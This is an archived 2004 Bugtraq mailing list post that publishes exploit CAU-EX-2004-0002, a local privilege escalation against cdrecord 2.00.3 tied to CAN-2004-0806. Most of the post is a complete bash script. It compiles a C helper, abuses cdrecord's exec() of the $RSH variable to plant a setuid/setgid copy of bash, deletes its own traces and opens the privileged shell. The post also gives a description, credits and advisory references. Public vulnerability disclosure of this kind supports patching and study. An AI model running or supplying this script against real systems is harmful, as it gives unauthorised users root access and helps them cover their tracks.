[36443] in bugtraq
CAU-EX-2004-0002: cdrecord-suidshell.sh
daemon@ATHENA.MIT.EDU (I)ruid)
Sun Sep 12 01:03:52 2004
From: "I)ruid" <druid@caughq.org>
To: bugtraq@securityfocus.com
Cc: full-disclosure@lists.netsys.com
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-DryvzvmBiujgcf7+gpGD"
Message-Id: <1094830948.8634.433.camel@zelda.corporate>
Mime-Version: 1.0
Date: Fri, 10 Sep 2004 10:42:28 -0500
--=-DryvzvmBiujgcf7+gpGD
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
____ ____ __ __
/ \ / \ | | | |
----=3D=3D=3D=3D####/ /\__\##/ /\ \##| |##| |####=3D=3D=3D=3D-=
---
| | | |__| | | | | |
| | ___ | __ | | | | |
------=3D=3D=3D=3D=3D=3D######\ \/ /#| |##| |#| |##| |######=3D=3D=
=3D=3D=3D=3D------
\____/ |__| |__| \______/
=20
Computer Academic Underground
http://www.caughq.org
Exploit Code
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D/=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Exploit ID: CAU-EX-2004-0002
Release Date: 09/09/2004
Title: cdrecord-suidshell.sh
Description: cdrecord $RSH exec() SUID Shell Creation
Tested: cdrecord 2.00.3
Attributes: Privileged Access
Exploit URL: http://www.caughq.org/exploits/CAU-EX-2004-0002.txt
Author/Email: I)ruid <druid@caughq.org>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D/=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Description
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
This shell script writes out and compiles a C application which sets
it's UID to it's EUID and copies a SUID shell to the current directory,
compiles it, then uses cdrecord's use of the $RSH environment variable
to execute it. It then cleans up it's mess and executes the shell for
convenience.
Notes
=3D=3D=3D=3D=3D
This exploit is written assuming your target shell is bash.
Credits
=3D=3D=3D=3D=3D=3D=3D
Max Vozeler is credited with discovering this vulnerability as stated
in the Mandrake Linux security advisory MDKSA-2004:091.
References
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
http://cve.mitre.org/cgi-bin/cvename.cgi?name=3DCAN-2004-0806
http://www.mandrakesecure.net/en/advisories/advisory.php?
name=3DMDKSA-2004:091
Exploit
=3D=3D=3D=3D=3D=3D=3D
#!/bin/bash
#
# cdrecord-suidshell.sh - I)ruid [CAU] (09.2004)
#
# Exploits cdrecord's exec() of $RSH before dropping privs=20
#
cat > ./cpbinbash.c << __EOF__
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
main( int argc, char *argv[] ) {
int fd1, fd2;
int count;
char buffer[1];
/* Set ID's */
setuid( geteuid() );
setgid( geteuid() );
/* Copy the shell */
if ((fd1=3Dopen( "/bin/bash", O_RDONLY))<0)
return -1;
if ((fd2=3Dopen( "./bash", O_WRONLY|O_CREAT))<0)
return -1;
while((count=3Dread(fd1, buffer, 1)))
write(fd2, buffer, count);
free(buffer);
close( fd1 );
close( fd2 );
/* Priv the shell */
chown( "./bash", geteuid(), geteuid() );
chmod( "./bash", 3565 );
}
__EOF__
cc ./cpbinbash.c -o ./cpbinbash
# Set up environment
export RSHSAVE=3D$RSH
export RSH=3D./cpbinbash
# Sploit
cdrecord dev=3D REMOTE:CAU:1,0,0 -
# Cleanup
rm cpbinbash*
export RSH=3D$RSHSAVE
export RSHSAVE=3D
# Use our suid bash
./bash -p=20
--=-DryvzvmBiujgcf7+gpGD
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQBBQctkatYEvo9mNMIRAoW9AJ9ymZ94QfVSjdQw92zM4jNQqDIwpQCePgJw
E1hF3SzPUhfVlnK//l3vpcs=
=QIIH
-----END PGP SIGNATURE-----
--=-DryvzvmBiujgcf7+gpGD--
